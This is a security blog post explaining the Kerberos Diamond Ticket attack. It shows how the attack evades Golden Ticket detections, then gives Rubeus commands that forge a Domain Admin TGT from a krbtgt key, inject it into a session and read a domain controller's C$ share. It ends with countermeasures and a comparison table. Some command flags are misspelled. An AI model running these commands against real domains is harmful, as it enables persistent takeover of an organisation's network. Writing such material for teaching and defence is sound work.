Tickets Kerberos - Diamond Ticket

Tickets Kerberos - Diamond Ticket

Celia Catalán

 

Completing the delivery of Kerberos Tickets , we give way to the Diamond Ticket.

Like a Golden Ticket , a Diamond Ticket is a TGT that can be used to access any service as any user.

A Golden Ticket is created completely offline, encrypted with the KRBTGT hash of the domain in question, and then passed to a user session for use. Because domain controllers do not track TGTs they have legitimately issued, they will readily accept any TGT that is encrypted with their own KRBTGT account hash.

There are two common ways to detect the use of Golden Tickets:

  • Perform a search for TGS-REQ requests that do not have a corresponding AS-REQ request
  • Perform a search for TGTs that have unusual values, such as a useful life of 10 years, which Mimikatz sets by default


A Diamond Ticket is generated differently, that is, by modifying the fields of a legitimate TGT previously issued by a DC. This is accomplished by first requesting a TGT, decrypting it with the domain's KRBTGT account hash, modifying the desired fields on the ticket, and then re-encrypting it. In this way, the two previously mentioned detections for a Golden Ticket are avoided, since:

  • The TGS-REQ will have an associated AS-REQ
  • The TGT was issued by a DC, which means it will have all the correct details of the domain's Kerberos policy. While it is true that these details can be accurately falsified during the creation of a Golden Ticket, it is more complex and open to error.

Impact:

A Diamond Ticket, like a Golden Ticket, allows unlimited and persistent access to any resource within the domain until the krbtgt key is changed, which can be a complex and disruptive process.

Explotation

As in the Golden Ticket, it is based on the total commitment of the domain

Ticket creation

To create the Diamond Ticket, we are also going to use the Rubeus tool, executing the following command:

Rubeus.exe diamond /domain:north.sevenkingdom.local /user:eddard.stark /password:FightP3aceAndHonor! /tickerusers:eddar.stark /tickettuserid:1111 /groups:512 /crykey:42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /nowrap


  • Domain: Domain name 
  • User: User with which the TGT to be modified will be requested
  • Password: Password of the user with which the TGT will be requested to modify
  • Ticketuser: User to impersonate
  • Ticketusersid: SID of the user to impersonate
  • Groups: Groups that we want to be added to the ticket (512 -> Domain Admins)
  • Krbkey: AES256 key for the KRBTGT account

Import the ticket


Once the ticket is obtained, we can verify that we do not have SMB access to the Domain Controller.

ls \\winterfell\c$


To gain access, we first import the ticket into our session. We can use Rubeus again to achieve this:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username:eddard.stark /password:PassFake /ticket: doIFvT[…]LkxPQ0FM



  • Program: Command to execute where the ticket will be injected
  • Domain: Domain name
  • Username: Domain user
  • Password: User password. It is not necessary to know the user's real password
  • Ticket: The ticket created previously

Once the ticket is imported, we can access the DC as we can see in the image.
ls \\winterfell\c$



Countermeasures:

  • Password Rotation: Regularly change passwords for service accounts. In particular, ensure that the KRBTGT account is protected and that its password is changed periodically, although carefully due to the significant impact it could have on the environment.
  • Service Account Security: Ensure that service accounts use strong, unique passwords.
  • Segmentation and Limitation of Privileges: Apply the principle of least privilege and segment the network to limit the scope of any potential compromise, ensuring that access to critical resources is restricted and monitored.
  • Audit and Monitoring: Configure audits and comprehensive monitoring of authentication activity and Kerberos ticket usage. Proactive Monitoring and Detection: Implement advanced monitoring and detection solutions that can identify anomalous patterns and suspicious activities, including analysis of network traffic, authentication activity, and use of anomalous Kerberos tickets.
  • Regular Audits and Reviews: Perform regular security audits and permissions reviews to identify and correct any misconfigurations or potential vulnerabilities.

Returning a little to the fair where we usually use many tickets, we leave you the following table as a summary:

Feature Silver Ticket Golden Ticket Diamond Ticket
Aim Specific service Access to the entire domain Access to the entire domain
Required Credentials Specific service account Domain administrator is KRBTGT. Domain administrator is KRBTGT.
Impact Limited access to a service Unlimited domain access Unlimited domain access
Attack Complexity Moderate high Very high
Key Countermeasures Password rotation, monitoring KRBTGT protection, comprehensive monitoring KRBTGT protection, comprehensive monitoring


With this we conclude the walk through the different attractions. See you at the next fair, sorry, delivery.

Alvaro Themes, cybersecurity analyst at Zerolynx.
return to blog

Leave a comment

Please note that comments must be approved before they are published.